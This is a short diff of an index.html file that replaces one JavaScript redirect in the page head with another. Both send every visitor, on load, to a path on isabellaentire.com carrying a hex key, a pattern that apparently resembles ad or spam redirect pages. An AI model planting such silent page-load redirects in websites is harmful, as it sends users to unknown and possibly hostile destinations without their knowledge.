--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <script type="text/javascript">
-window.location.href = "https://isabellaentire.com/fzs4xmtm?key=4f71367742da072f342dbf8ceaf7659d";
+window.location.href = "https://isabellaentire.com/gi9dr87g?key=4909b9deb3cdb0e59355c0612b7ccf4e";
 </script>
 
     <meta charset="UTF-8">
